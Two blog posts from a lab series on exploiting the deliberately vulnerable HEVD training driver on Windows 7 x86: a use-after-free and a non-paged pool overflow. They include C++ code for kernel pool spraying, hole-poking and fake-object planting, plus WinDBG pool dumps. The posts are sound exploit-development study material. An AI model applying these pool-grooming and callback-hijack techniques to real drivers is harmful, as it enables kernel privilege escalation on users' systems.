
HEVD Exploits – Windows 7 x86 Use-After-Free

By: h0mbre
23 April 2020 at 04:00

Introduction

Continuing on with my goal to develop exploits for the Hacksys Extreme Vulnerable Driver, I will be using HEVD 2.0. There are a ton of good blog posts out there walking through various HEVD exploits. I recommend you read them all! I referenced them heavily as I tried to complete these exploits. Almost nothing I do or say in this blog will be new or my own thoughts/ideas/techniques. There were instances where I diverged from the strategies I saw employed in those blog posts, either out of necessity or because I was trying to do my own thing to learn more.

This series will be light on tangential information such as:

  • how drivers work, the different types, communication between userland, the kernel, and drivers, etc
  • how to install HEVD,
  • how to set up a lab environment
  • shellcode analysis

The reason for this is simple: the other blog posts do a much better job detailing this information than I could ever hope to. It feels silly writing this blog series in the first place knowing that there are far superior posts out there; I will not make it even more silly by shoddily explaining these things at a high level in poorer fashion than those aforementioned posts. Those authors have way more experience than I do and far superior knowledge, so I will let them do the explaining. :)

This post/series will instead focus on my experience trying to craft the actual exploits.

Thanks

UAF Setup

I’ve never exploited a use-after-free bug on any system before. I vaguely understood the concept before starting this exercise. We need what, in my noob opinion, seems like quite a lot of primitives in order to make this work. Obviously HEVD goes out of its way to be vulnerable in precisely the correct way for us to get an exploit working, which is perfect for me since I have no experience with this bug class and we’re just here to learn. I feel like although we have to utilize multiple functions via IOCTL, this is actually a simpler exploit to pull off than the pool overflow that we just did.

Also, I wanted to do this on 64 bit; however, most of the strategies I saw outlined required that we use NtQuerySystemInformation, which as far as I know requires your process to be elevated to an extent so I wanted to avoid that. On 64 bit, the pool header structure size changes from 0x8 bytes to 0x10 bytes which makes exploitation more cumbersome; however, there are some good walkthroughs out there about how to accomplish this. For now, let’s stick to x86.

What do we need in order to exploit a use-after-free bug? Well, it seems like after doing this exercise we need to be able to do the following:

  • allocate an object in the non-paged pool,
  • a mechanism that creates a reference to the object as a global variable, i.e., if our object is allocated at 0xFFFFFFFF, there is some variable out there in the program that is storing that address for later use,
  • the ability to free the memory and not have the previously established reference NULLed out, i.e., when the chunk is freed the program author doesn’t specify that the reference = NULL,
  • the ability to create “fake” objects that have the same size and controllable contents in the non-paged pool,
  • the ability to spray the non-paged pool and create perfectly sized holes so that our UAF and fake objects can be fitted in our created holes,
  • finally, the ability to use the no-longer valid reference to our freed chunk.

Allocating the UAF Object in the Pool

Let’s take a look at the UAF object allocation routine in the driver in IDA.

It may not be immediately clear what’s going on without stepping through the routine in the debugger but we actually have very little control over what is taking place here. I’ve created a small skeleton exploit code and set a breakpoint towards the start of the routine. Here is our code at the moment:

#include <iostream>
#include <Windows.h>

using namespace std;

#define DEVICE_NAME             "\\\\.\\HackSysExtremeVulnerableDriver"
#define ALLOCATE_UAF_IOCTL      0x222013
#define FREE_UAF_IOCTL          0x22201B
#define FAKE_OBJECT_IOCTL       0x22201F
#define USE_UAF_IOCTL           0x222017

HANDLE grab_handle() {

    HANDLE hFile = CreateFileA(DEVICE_NAME,
        FILE_READ_ACCESS | FILE_WRITE_ACCESS,
        FILE_SHARE_READ | FILE_SHARE_WRITE,
        NULL,
        OPEN_EXISTING,
        FILE_FLAG_OVERLAPPED | FILE_ATTRIBUTE_NORMAL,
        NULL);

    if (hFile == INVALID_HANDLE_VALUE) {
        cout << "[!] No handle to HackSysExtremeVulnerableDriver\n";
        exit(1);
    }

    cout << "[>] Grabbed handle to HackSysExtremeVulnerableDriver: " << hex
        << hFile << "\n";

    return hFile;
}

void create_UAF_object(HANDLE hFile) {

    BYTE input_buffer[] = "\x00";

    DWORD bytes_ret = 0x0;

    int result = DeviceIoControl(hFile,
        ALLOCATE_UAF_IOCTL,
        input_buffer,
        sizeof(input_buffer),
        NULL,
        0,
        &bytes_ret,
        NULL);
}


int main() {

    HANDLE hFile = grab_handle();

    create_UAF_object(hFile);

    return 0;
}

You can see from the IDA screenshot that after the call to ExAllocatePoolWithTag, eax is placed in esi; this is about where I’ve placed the breakpoint. We can then take the value in esi, which should be a pointer to our allocation, and go see what the allocation will look like after the subsequent memset operation completes. We can see some static values as well, such as what appears to be the size of the allocation (0x58), which we know from our last post is actually undersold by 0x8 since we also have to account for the pool header, so our real allocation size in the pool is 0x60 bytes.

So we hit our breakpoint after ExAllocatePoolWithTag and then I just stepped through until the memset completed.

Right after the memset completed, we look up our object in the pool and see that it’s mostly been filled with A characters, except for the first DWORD, which has been left NULL. After stepping through the next two instructions:

We can see that the DWORD value has been filled and also that a null terminator has been added to the last byte of our allocation. This DWORD is the UaFObjectCallback which is a function pointer for a callback which gets used during a separate routine.
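Based on those debugger observations, the object layout is presumably something like the following (my own reconstruction for illustration; the names are guesses, not HEVD source):

typedef void (*UAF_CALLBACK)(void);

// Presumed layout of the 0x58-byte UAF object, pieced together from the
// debugger output above: a callback pointer up front, then a buffer of 'A's
// with the final byte NULL-terminated.
typedef struct _UAF_OBJECT {
    UAF_CALLBACK Callback;   // the DWORD filled in after the memset
    char Buffer[0x54];       // 'A' characters, last byte set to NULL
} UAF_OBJECT;                // 0x58 bytes + 0x8 pool header = 0x60 in the pool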

And lastly in the screenshot we can see the driver move esi, which holds the location of our allocation, into the global variable g_UseAfterFreeObject. This is important because this is what makes the code vulnerable: this same variable will not be NULLed out when the object is freed.

Freeing the UAF Object

Now, let’s try interacting with the driver routine which allows us to free our object.

Not a whole lot here; we can see though that there is no effort made to NULL the global variable g_UseAfterFreeObject. You can see that even after we run the routine, the variable still holds the value of our freed allocation address:

Allocating a Fake Object

Now let’s see how much freedom we have to allocate arbitrary objects in the non-paged pool. Looking at the function, it uses the same APIs we’re familiar with, does a probe for read to make sure the buffer is in user land (I think?), and then builds our chunk to our specifications.

I just sent a buffer of size 0x58 filled with A characters for testing. It even appends a null terminator to the end like the real UAF object allocator, but we control the contents of this one. This is good since we’ll have full control over the pointer value at the start of the chunk that serves as the callback function pointer.

Executing UAF Object Callback

This is where the “use” portion of “Use-After-Free” comes in. There is a driver routine that allows us to take the address which holds the callback function pointer of the UAF object and then call the function there. We can see this in IDA.

We can see that as long as the value at [eax], which holds the address of our UAF object (or what used to be our UAF object before we freed it) is not NULL, we’ll go ahead and call the function pointer stored at that location (the callback function). Right now, if we called this, what would happen? Let’s see!

Looking up the memory address of what was our freed chunk we see that it is NOT NULL. We would actually call something, but the address that would be called is 0x852c22f0. Looking at that address, we see that there is just arbitrary code there.

This is not what we want. We want this to be predictable just like our last exploit. We want the freed address of our UAF object to be filled with our fake object, so when the function pointer at that address is called, it will be a pointer we control, our shellcode. To do this, our plan of attack is very similar to our last post. Please go through that exploit first!

Spraying the Non-Paged Pool

First things first, we need an object that fits our needs. Last post we used Event Objects, but this time around, since we need 0x60 sized chunks, we’ll be using IoCompletionReserve objects which we can allocate with NtAllocateReserveObject (thanks blogpost authors).

We’ll do the same thing we did last time but spray some more. In my testing I found that I had to spray more to get the chunks sequential like we want:

  • defragment the pool with 10,000 objects
  • aim for some sequential/contiguous blocks of objects with another spray of 30,000 objects.

Next, we’ll want to poke holes in the contiguous block portion, remember? We’ll be collecting handles to these objects in vectors so that we can later free the ones we need to create the holes. The holes are already the perfect size, so we’ll just free every other handle in the contiguous block; that way, every hole created in our contiguous block will be surrounded on both sides by our objects. Let’s update our exploit code and test out the spray. Huge thanks to @tekwizz123 once again for showing in his exploit how to get NtAllocateReserveObject into the program; it would’ve taken me a long time to troubleshoot those compilation errors without his help. Our spray test code:

#include <iostream>
#include <vector>
#include <Windows.h>

using namespace std;

#define DEVICE_NAME             "\\\\.\\HackSysExtremeVulnerableDriver"
#define ALLOCATE_UAF_IOCTL      0x222013
#define FREE_UAF_IOCTL          0x22201B
#define FAKE_OBJECT_IOCTL       0x22201F
#define USE_UAF_IOCTL           0x222017

vector<HANDLE> defrag_handles;
vector<HANDLE> sequential_handles;

typedef struct _LSA_UNICODE_STRING {
    USHORT Length;
    USHORT MaximumLength;
    PWSTR Buffer;
} UNICODE_STRING;

typedef struct _OBJECT_ATTRIBUTES {
    ULONG Length;
    HANDLE RootDirectory;
    UNICODE_STRING* ObjectName;
    ULONG Attributes;
    PVOID SecurityDescriptor;
    PVOID SecurityQualityOfService;
} OBJECT_ATTRIBUTES;

#define POBJECT_ATTRIBUTES OBJECT_ATTRIBUTES*

typedef NTSTATUS(WINAPI* _NtAllocateReserveObject)(
    OUT PHANDLE hObject,
    IN POBJECT_ATTRIBUTES ObjectAttributes,
    IN DWORD ObjectType);

HANDLE grab_handle() {

    HANDLE hFile = CreateFileA(DEVICE_NAME,
        FILE_READ_ACCESS | FILE_WRITE_ACCESS,
        FILE_SHARE_READ | FILE_SHARE_WRITE,
        NULL,
        OPEN_EXISTING,
        FILE_FLAG_OVERLAPPED | FILE_ATTRIBUTE_NORMAL,
        NULL);

    if (hFile == INVALID_HANDLE_VALUE) {
        cout << "[!] No handle to HackSysExtremeVulnerableDriver\n";
        exit(1);
    }

    cout << "[>] Grabbed handle to HackSysExtremeVulnerableDriver: " << hex
        << hFile << "\n";

    return hFile;
}

void create_UAF_object(HANDLE hFile) {

    cout << "[>] Creating UAF object...\n";
    BYTE input_buffer[] = "\x00";

    DWORD bytes_ret = 0x0;

    int result = DeviceIoControl(hFile,
        ALLOCATE_UAF_IOCTL,
        input_buffer,
        sizeof(input_buffer),
        NULL,
        0,
        &bytes_ret,
        NULL);

    if (!result) {

        cout << "[!] Could not create UAF object\n";
        cout << "[!] Last error: " << dec << GetLastError() << "\n";
        exit(1);
    }
    cout << "[>] UAF object allocated.\n";
}

void free_UAF_object(HANDLE hFile) {

    cout << "[>] Freeing UAF object...\n";
    BYTE input_buffer[] = "\x00";

    DWORD bytes_ret = 0x0;

    int result = DeviceIoControl(hFile,
        FREE_UAF_IOCTL,
        input_buffer,
        sizeof(input_buffer),
        NULL,
        0,
        &bytes_ret,
        NULL);

    if (!result) {

        cout << "[!] Could not free UAF object\n";
        cout << "[!] Last error: " << dec << GetLastError() << "\n";
        exit(1);
    }
    cout << "[>] UAF object freed.\n";
}

void allocate_fake_object(HANDLE hFile) {

    cout << "[>] Creating fake UAF object...\n";
    BYTE input_buffer[0x58] = { 0 };

    memset((void*)input_buffer, '\x41', 0x58);

    DWORD bytes_ret = 0x0;

    int result = DeviceIoControl(hFile,
        FAKE_OBJECT_IOCTL,
        input_buffer,
        sizeof(input_buffer),
        NULL,
        0,
        &bytes_ret,
        NULL);

    if (!result) {

        cout << "[!] Could not create fake UAF object\n";
        cout << "[!] Last error: " << dec << GetLastError() << "\n";
        exit(1);
    }
    cout << "[>] Fake UAF object created.\n";
}

void spray() {

    // thanks Tekwizz as usual
    _NtAllocateReserveObject NtAllocateReserveObject = 
        (_NtAllocateReserveObject)GetProcAddress(GetModuleHandleA("ntdll.dll"),
            "NtAllocateReserveObject");

    if (!NtAllocateReserveObject) {

        cout << "[!] Failed to get the address of NtAllocateReserve.\n";
        cout << "[!] Last error " << GetLastError() << "\n";
        exit(1);
    }

    cout << "[>] Spraying pool to defragment...\n";
    for (int i = 0; i < 10000; i++) {

        HANDLE hObject = 0x0;

        PHANDLE result = (PHANDLE)NtAllocateReserveObject((PHANDLE)&hObject,
            NULL,
            1); // specifies the correct object

        if (result != 0) {
            cout << "[!] Error allocating IoCo Object during defragmentation\n";
            exit(1);
        }
        defrag_handles.push_back(hObject);
    }
    cout << "[>] Defragmentation spray complete.\n";
    cout << "[>] Spraying sequential allocations...\n";
    for (int i = 0; i < 30000; i++) {

        HANDLE hObject = 0x0;

        PHANDLE result = (PHANDLE)NtAllocateReserveObject((PHANDLE)&hObject,
            NULL,
            1); // specifies the correct object

        if (result != 0) {
            cout << "[!] Error allocating IoCo Object during defragmentation\n";
            exit(1);
        }
        sequential_handles.push_back(hObject);
    }

    cout << "[>] Sequential spray complete.\n";

    cout << "[>] Poking 0x60 byte-sized holes in our sequential allocation...\n";
    for (int i = 0; i < sequential_handles.size(); i++) {
        if (i % 2 == 0) {
            BOOL freed = CloseHandle(sequential_handles[i]);
        }
    }
    cout << "[>] Holes poked lol.\n";
    cout << "[>] Some handles: " << hex << sequential_handles[29997] << "\n";
    cout << "[>] Some handles: " << hex << sequential_handles[29998] << "\n";
    cout << "[>] Some handles: " << hex << sequential_handles[29999] << "\n";

    Sleep(1000);
    DebugBreak();
}

int main() {

    HANDLE hFile = grab_handle();

    //create_UAF_object(hFile);

    //free_UAF_object(hFile);

    //allocate_fake_object(hFile);

    spray();

    return 0;
}

We can see after running this and looking at one of the handles we dumped to the terminal (thanks FuzzySec!) that we were able to get our pool looking the way we want: free 0x60 byte chunks surrounded by our IoCo objects.

kd> !handle 0x2724c

PROCESS 86974250  SessionId: 1  Cid: 1238    Peb: 7ffdf000  ParentCid: 1554
    DirBase: bf5d4fc0  ObjectTable: abb08b80  HandleCount: 25007.
    Image: HEVDUAF.exe

Handle table at 89f1f000 with 25007 entries in use

2724c: Object: 8543b6d0  GrantedAccess: 000f0003 Entry: 88415498
Object: 8543b6d0  Type: (84ff1a88) IoCompletionReserve
    ObjectHeader: 8543b6b8 (new version)
        HandleCount: 1  PointerCount: 1


kd> !pool 8543b6d0 
Pool page 8543b6d0 region is Nonpaged pool
 8543b000 size:   60 previous size:    0  (Allocated)  IoCo (Protected)
 8543b060 size:   38 previous size:   60  (Free)       `.C.
 8543b098 size:   20 previous size:   38  (Allocated)  ReTa
 8543b0b8 size:   28 previous size:   20  (Allocated)  FSro
 8543b0e0 size:  500 previous size:   28  (Free)       Io  
 8543b5e0 size:   60 previous size:  500  (Allocated)  IoCo (Protected)
 8543b640 size:   60 previous size:   60  (Free)       IoCo
*8543b6a0 size:   60 previous size:   60  (Allocated) *IoCo (Protected)
		Owning component : Unknown (update pooltag.txt)
 8543b700 size:   60 previous size:   60  (Free)       IoCo
 8543b760 size:   60 previous size:   60  (Allocated)  IoCo (Protected)
 8543b7c0 size:   60 previous size:   60  (Free)       IoCo
 8543b820 size:   60 previous size:   60  (Allocated)  IoCo (Protected)
 8543b880 size:   60 previous size:   60  (Free)       IoCo
 8543b8e0 size:   60 previous size:   60  (Allocated)  IoCo (Protected)
 8543b940 size:   60 previous size:   60  (Free)       IoCo
 8543b9a0 size:   60 previous size:   60  (Allocated)  IoCo (Protected)
 8543ba00 size:   60 previous size:   60  (Free)       IoCo
 8543ba60 size:   60 previous size:   60  (Allocated)  IoCo (Protected)
 8543bac0 size:   60 previous size:   60  (Free)       IoCo
 8543bb20 size:   60 previous size:   60  (Allocated)  IoCo (Protected)
 8543bb80 size:   60 previous size:   60  (Free)       IoCo
 8543bbe0 size:   60 previous size:   60  (Allocated)  IoCo (Protected)
 8543bc40 size:   60 previous size:   60  (Free)       IoCo
 8543bca0 size:   60 previous size:   60  (Allocated)  IoCo (Protected)
 8543bd00 size:   60 previous size:   60  (Free)       IoCo
 8543bd60 size:   60 previous size:   60  (Allocated)  IoCo (Protected)
 8543bdc0 size:   60 previous size:   60  (Free)       IoCo
 8543be20 size:   60 previous size:   60  (Allocated)  IoCo (Protected)
 8543be80 size:   60 previous size:   60  (Free)       IoCo
 8543bee0 size:   60 previous size:   60  (Allocated)  IoCo (Protected)
 8543bf40 size:   60 previous size:   60  (Free)       IoCo
 8543bfa0 size:   60 previous size:   60  (Allocated)  IoCo (Protected)

Executing Plan

Now that we’ve confirmed our heap spray works, the next step is to implement our game-plan. We want to:

  • spray the heap to get it like so ^^,
  • allocate our UAF object,
  • free our UAF object,
  • create our fake objects with malicious callback function pointers,
  • activate the callback function.

All we really need to do now is allocate the shellcode, get a pointer to it, place that pointer at the front of our input buffer when we create our fake objects, and spray those fake objects into the holes we poked, so around 15,000 of them.
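As a rough sketch (assuming the helper functions and IOCTL defines above, and that the callback pointer occupies the first four bytes of the fake object as observed earlier), the fake-object spray could look something like this:

void spray_fake_objects(HANDLE hFile, LPVOID shellcode_ptr) {

    BYTE input_buffer[0x58] = { 0 };

    // the first DWORD of the fake object is the callback pointer the driver
    // will eventually call
    memcpy(input_buffer, &shellcode_ptr, sizeof(LPVOID));

    // pad the rest so we still hand the driver a full 0x58-byte object
    memset(input_buffer + sizeof(LPVOID), '\x41', 0x58 - sizeof(LPVOID));

    DWORD bytes_ret = 0x0;

    // roughly one fake object per hole we poked (~15,000)
    for (int i = 0; i < 15000; i++) {
        DeviceIoControl(hFile,
            FAKE_OBJECT_IOCTL,
            input_buffer,
            sizeof(input_buffer),
            NULL,
            0,
            &bytes_ret,
            NULL);
    }
}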

When we run our final code, we get our system shell!

Complete exploit code.

Conclusion

That was a pretty exaggerated exploit scenario I would guess, but it was perfect for me since I had never done a UAF exploit before. Next we’ll be doing the stack overflow again but this time on Windows 10 where we’ll have to bypass SMEP. Until next time.

Once again, big thanks to all the content producers out there for getting me through these exploits.

HEVD Exploits – Windows 7 x86 Non-Paged Pool Overflow

By: h0mbre
22 April 2020 at 04:00

Introduction

Continuing on with my goal to develop exploits for the Hacksys Extreme Vulnerable Driver, I will be using HEVD 2.0. There are a ton of good blog posts out there walking through various HEVD exploits. I recommend you read them all! I referenced them heavily as I tried to complete these exploits. Almost nothing I do or say in this blog will be new or my own thoughts/ideas/techniques. There were instances where I diverged from the strategies I saw employed in those blog posts, either out of necessity or because I was trying to do my own thing to learn more.

This series will be light on tangential information such as:

  • how drivers work, the different types, communication between userland, the kernel, and drivers, etc
  • how to install HEVD,
  • how to set up a lab environment
  • shellcode analysis

The reason for this is simple: the other blog posts do a much better job detailing this information than I could ever hope to. It feels silly writing this blog series in the first place knowing that there are far superior posts out there; I will not make it even more silly by shoddily explaining these things at a high level in poorer fashion than those aforementioned posts. Those authors have way more experience than I do and far superior knowledge, so I will let them do the explaining. :)

This post/series will instead focus on my experience trying to craft the actual exploits.

Thanks

This exploit required a lot of insight into the non-paged pool internals of Windows 7. These walkthroughs/blogs were extremely well written and made everything very logical and clear. I really appreciate the authors’ help! Again, I’m just recreating other people’s exploits in this series trying to learn, not inventing new ways to exploit pool overflows for 32 bit Windows 7. The exploit also required allocating the NULL page, which isn’t possible on x64 so this will be a 32 bit exploit only.

Reversing Relevant Function

The bug in this driver routine is really similar to some of the stack based buffer overflow vulnerabilities we’ve already done, like the stack overflow and the integer overflow. We get a user buffer and send it to the routine, which will allocate a kernel buffer and copy our user buffer into the kernel buffer. The only difference here is the type of memory used. Instead of the stack, this memory is allocated in the non-paged pool, which consists of pool chunks that are guaranteed to be resident in physical memory (RAM) at all times and cannot be paged out. This stands in contrast to paged pool, which is allowed to be “paged out” to a secondary storage medium when RAM runs short.

The APIs that are relevant in this routine are ExAllocatePoolWithTag and ExFreePoolWithTag. The prototype of ExAllocatePoolWithTag looks like this:

PVOID ExAllocatePoolWithTag(
  __drv_strictTypeMatch(__drv_typeExpr)POOL_TYPE PoolType,
  SIZE_T                                         NumberOfBytes,
  ULONG                                          Tag
);

In our routine all of these parameters are hardcoded for us. PoolType is set to NonPagedPool, NumberOfBytes is set to 0x1F8, and Tag is set to 0x6B636148 (‘Hack’). This by itself is fine and obviously there is no vulnerability; however, the driver routine uses memcpy to transfer data from the user buffer to this newly allocated non-paged pool kernel buffer and uses the size of the user buffer as the size argument. (This is precisely the bug in the Jungo driver that @steventseeley discovered via fuzzing.) If the size of our user buffer is larger than the kernel buffer, we will overwrite some data in the adjacent non-paged pool. Here is a screenshot of the function in IDA Free 7.0.

Nothing too complicated reversing-wise; we can even see that right after our pool buffer is allocated, it is de-allocated with ExFreePoolWithTag.
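In rough pseudocode, the routine boils down to something like this (my paraphrase of the disassembly, not HEVD’s actual source):

KernelBuffer = ExAllocatePoolWithTag(NonPagedPool, 0x1F8, 'kcaH');

// BUG: the copy length is the user-supplied buffer size, not the fixed 0x1F8
memcpy(KernelBuffer, UserBuffer, Size);

ExFreePoolWithTag(KernelBuffer, 'kcaH');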

If we call the function with the following skeleton code, we will see in WinDBG that everything works as normal and we can start trying to understand how the pool chunks are structured.

#include <iostream>
#include <Windows.h>

using namespace std;

#define DEVICE_NAME         "\\\\.\\HackSysExtremeVulnerableDriver"
#define IOCTL               0x22200F


HANDLE grab_handle() {

    HANDLE hFile = CreateFileA(DEVICE_NAME,
        FILE_READ_ACCESS | FILE_WRITE_ACCESS,
        FILE_SHARE_READ | FILE_SHARE_WRITE,
        NULL,
        OPEN_EXISTING,
        FILE_FLAG_OVERLAPPED | FILE_ATTRIBUTE_NORMAL,
        NULL);

    if (hFile == INVALID_HANDLE_VALUE) {
        cout << "[!] No handle to HackSysExtremeVulnerableDriver\n";
        exit(1);
    }

    cout << "[>] Grabbed handle to HackSysExtremeVulnerableDriver: " << hex
        << hFile << "\n";

    return hFile;
}

void send_payload(HANDLE hFile) {

    ULONG payload_len = 0x1F8;

    LPVOID input_buff = VirtualAlloc(NULL,
        payload_len + 0x1,
        MEM_RESERVE | MEM_COMMIT,
        PAGE_EXECUTE_READWRITE);

    memset(input_buff, '\x42', payload_len);

    cout << "[>] Sending buffer size of: " << dec << payload_len << "\n";

    DWORD bytes_ret = 0;

    int result = DeviceIoControl(hFile,
        IOCTL,
        input_buff,
        payload_len,
        NULL,
        0,
        &bytes_ret,
        NULL);

    if (!result) {

        cout << "[!] DeviceIoControl failed!\n";

    }
}

int main() {

    HANDLE hFile = grab_handle();

    send_payload(hFile);

    return 0;
}

I set a breakpoint at offset 0x4D64 with this command in WinDBG: bp !HEVD+4D64, which is right after the memcpy operation, and we see that our pool buffer has been filled with our \x42 characters. At this point a pointer to the allocated kernel buffer is still in eax, so we can go to that location with the !pool command, which will start at the beginning of that page of memory and display certain aspects of the memory allocated there.

kd> !pool 85246430
Pool page 85246430 region is Nonpaged pool
 85246000 size:   c8 previous size:    0  (Allocated)  Ntfx
 852460c8 size:   10 previous size:   c8  (Free)       .PZH
 852460d8 size:   20 previous size:   10  (Allocated)  ReTa
 852460f8 size:   20 previous size:   20  (Allocated)  ReTa
 85246118 size:   48 previous size:   20  (Allocated)  Vad 
 85246160 size:   68 previous size:   48  (Allocated)  NpFn Process: 8507a030
 852461c8 size:   20 previous size:   68  (Allocated)  ReTa
 852461e8 size:   20 previous size:   20  (Allocated)  ReTa
 85246208 size:  168 previous size:   20  (Free)       CcSc
 85246370 size:   b8 previous size:  168  (Allocated)  NbtD
*85246428 size:  200 previous size:   b8  (Allocated) *Hack
		Owning component : Unknown (update pooltag.txt)
 85246628 size:   20 previous size:  200  (Allocated)  ReTa
 85246648 size:   68 previous size:   20  (Allocated)  FMsl
 852466b0 size:   c8 previous size:   68  (Allocated)  Ntfx
 85246778 size:  180 previous size:   c8  (Free)       EtwG
 852468f8 size:   98 previous size:  180  (Allocated)  MmCa
 85246990 size:    8 previous size:   98  (Free)       Nb29
 85246998 size:   48 previous size:    8  (Allocated)  Vad 
 852469e0 size:  1b8 previous size:   48  (Allocated)  LSbf
 85246b98 size:   b8 previous size:  1b8  (Allocated)  File (Protected)
 85246c50 size:   60 previous size:   b8  (Free)       Clfs
 85246cb0 size:  1b0 previous size:   60  (Allocated)  NSIk
 85246e60 size:   20 previous size:  1b0  (Allocated)  ReTa
 85246e80 size:   b8 previous size:   20  (Allocated)  File (Protected)
 85246f38 size:   c8 previous size:   b8  (Allocated)  Ntfx

We see that even though our pointer in eax to our kernel buffer was 0x85246430, the allocation actually begins at 0x85246428, which is 0x8 bytes earlier. This is because there is a 4 byte ULONG value and our pool tag placed before our actual buffer begins. Using some of the commands from the aforementioned blogposts goes a long way in WinDBG towards being able to clearly think about these data structures.

kd> dt nt!_POOL_HEADER 85246428
   +0x000 PreviousSize     : 0y000010111 (0x17)
   +0x000 PoolIndex        : 0y0000000 (0)
   +0x002 BlockSize        : 0y001000000 (0x40)
   +0x002 PoolType         : 0y0000010 (0x2)
   +0x000 Ulong1           : 0x4400017
   +0x004 PoolTag          : 0x6b636148
   +0x004 AllocatorBackTraceIndex : 0x6148
   +0x006 PoolTagHash      : 0x6b63

This shows us the makeup of the pool header. We can see it spans 8 total bytes, which we knew. The numbers that begin with 0y are binary. You can see that PreviousSize, PoolIndex, BlockSize, and PoolType all get their values packed together to form the Ulong1 member, which begins at offset 0x000. Then, at offset 0x004, we get our pool tag. So that’s all 8 bytes accounted for. We can use the memory pane to scroll to the bottom of our buffer and spy on the next memory chunk’s header as well.
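As a sanity check on how those bitfields pack together (my own arithmetic, using the bit positions shown by dt: PreviousSize in bits 0-8, PoolIndex in bits 9-15, BlockSize in bits 16-24, PoolType in bits 25-31):

Ulong1 = PreviousSize | (PoolIndex << 9) | (BlockSize << 16) | (PoolType << 25)
       = 0x17 | (0x0 << 9) | (0x40 << 16) | (0x2 << 25)
       = 0x04400017

Note that PreviousSize and BlockSize are expressed in 8-byte units, so a BlockSize of 0x40 corresponds to our 0x40 * 0x8 = 0x200 byte chunk.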

We can see that the header values for the next chunk are: 40 00 04 04 52 65 54 61.

The only other thing to pay attention to is that the !pool command told us our chunk was 0x200 bytes long, which makes sense when you add the size of the header (0x8) to our allocated buffer size of 0x1F8.

Generic Attack Strategy

Before we proceed, we have to understand how we’re going to utilize this ability, via our oversized user buffer, to arbitrarily overwrite data in the adjacent pool allocation as an attack vector. What we have right now is the ability to overwrite pool memory. In order for this to be worthwhile for us, we have to find a way to get the pool into a state where what we’re overwriting is predictable. If what we’re overwriting is unpredictable, we can never form a reliable exploit. If we damage some of the fields here and aren’t surgical in our overwrites, we’ll easily get a BSOD.

Generically, in its organic state, the non-paged pool is fragmented, meaning there are holes in it from chunks being freed arbitrarily by other processes on the system. What we want to do is cover these holes by spraying a ton of objects into the non-paged pool so that the pool allocation mechanism places our chunks into those available slots. Once this is complete, we’ll want to spray even more objects so that by far, the most common objects in the pool are the ones we have just sprayed.

By way of analogy, if you had a bag of a chess set’s pieces, you would have low odds of pulling a King from the bag; however, if you then added 15,000 Kings to the bag, your chances are much better!

So we have two goals outlined so far:

  • spray the pool with objects until its organically existing holes are patched with our objects,
  • spray the pool again to increase the sheer number of objects we’ve allocated so that they’ll be sequential in non-paged pool memory.

What we’ll do next is take our pretty pool allocations that form a large solid block and poke holes in it the size of the kernel buffer we can allocate with the driver routine. Our kernel buffer is 0x200 bytes, remember. This way, when our kernel buffer is allocated in the pool, the allocator will place it in the newly freed 0x200 byte hole we have just created. Now what we have is our allocation completely surrounded by the objects we had sprayed. This is perfect because now when our buffer overwrites data in the adjacent pool allocation, we’ll know exactly what we’re overwriting because it will be a chunk that we allocated ourselves, not one belonging to an arbitrary system process.

We will use this ability to predictably overwrite a piece of data in one of our allocated objects that will, once the allocation is freed, lead to the kernel executing a function pointer which we will have pointed at our shellcode. So now our generic gameplan is:

  • spray the pool with objects until its organically existing holes are patched with our objects,
  • spray the pool again to increase the sheer number of objects we’ve allocated so that they’ll be sequential in non-paged pool memory,
  • poke some nice 0x200 byte-sized holes in the allocations,
  • use our driver routine to fit our kernel buffer in one of these new holes,
  • have that allocation predictably overwrite information in the adjacent allocation that leads to kernel execution of our shellcode when the corrupted allocation is freed.

Next, we’ll get to know the object we’ll be using to spray the pool.

Event Objects

The blogpost authors inform us that Event Objects are perfect for this job for a few reasons, but one of the main reasons is that it is 0x40 bytes in size. A quick Python interpreter check shows us that we can neatly free 8 Event Objects and have our 0x200 byte sized holes we wanted.

>>> 0x200 % 0x40
0
>>> 0x200 / 0x40
8.0

We don’t care much about the content of these events, so every parameter will be basically NULL when we use the CreateEvent API:

HANDLE CreateEventA(
  LPSECURITY_ATTRIBUTES lpEventAttributes,
  BOOL                  bManualReset,
  BOOL                  bInitialState,
  LPCSTR                lpName
);

What’s most important for us now is finding out what we need to overwrite in this object to get code execution when the corrupted Event Object is freed. We’ll go ahead and spray a similar number of objects to what FuzzySec and r0otki7 did:

  • 10,000 to fill the holes in the fragmented pool
  • 5,000 to create a nice long contiguous block of Event Objects

Our code now looks like this:

#include <iostream>
#include <vector>
#include <Windows.h>

using namespace std;

#define DEVICE_NAME         "\\\\.\\HackSysExtremeVulnerableDriver"
#define IOCTL               0x22200F

vector<HANDLE> defragment_handles;
vector<HANDLE> sequential_handles;

HANDLE grab_handle() {

    HANDLE hFile = CreateFileA(DEVICE_NAME,
        FILE_READ_ACCESS | FILE_WRITE_ACCESS,
        FILE_SHARE_READ | FILE_SHARE_WRITE,
        NULL,
        OPEN_EXISTING,
        FILE_FLAG_OVERLAPPED | FILE_ATTRIBUTE_NORMAL,
        NULL);

    if (hFile == INVALID_HANDLE_VALUE) {
        cout << "[!] No handle to HackSysExtremeVulnerableDriver\n";
        exit(1);
    }

    cout << "[>] Grabbed handle to HackSysExtremeVulnerableDriver: " << hex
        << hFile << "\n";

    return hFile;
}

void spray_pool() {

    cout << "[>] Spraying pool to defragment...\n";
    for (int i = 0; i < 10000; i++) {

        HANDLE result = CreateEvent(NULL,
            0,
            0,
            L"");

        if (!result) {
            cout << "[!] Error allocating Event Object during defragmentation\n";
            exit(1);
        }

        defragment_handles.push_back(result);
    }
    cout << "[>] Defragmentation spray complete.\n";
    cout << "[>] Spraying sequential allocations...\n";
    for (int i = 0; i < 10000; i++) {

        HANDLE result = CreateEvent(NULL,
            0,
            0,
            L"");

        if (!result) {
            cout << "[!] Error allocating Event Object during sequential.\n";
            exit(1);
        }

        sequential_handles.push_back(result);
    }
    
    cout << "[>] Sequential spray complete.\n";
}

void send_payload(HANDLE hFile) {
    
    ULONG payload_len = 0x1F8;

    LPVOID input_buff = VirtualAlloc(NULL,
        payload_len + 0x1,
        MEM_RESERVE | MEM_COMMIT,
        PAGE_EXECUTE_READWRITE);

    memset(input_buff, '\x42', payload_len);

    cout << "[>] Sending buffer size of: " << dec << payload_len << "\n";

    DWORD bytes_ret = 0;

    int result = DeviceIoControl(hFile,
        IOCTL,
        input_buff,
        payload_len,
        NULL,
        0,
        &bytes_ret,
        NULL);

    if (!result) {

        cout << "[!] DeviceIoControl failed!\n";

    }
}

int main() {

    HANDLE hFile = grab_handle();

    spray_pool();

    send_payload(hFile);

    return 0;
}

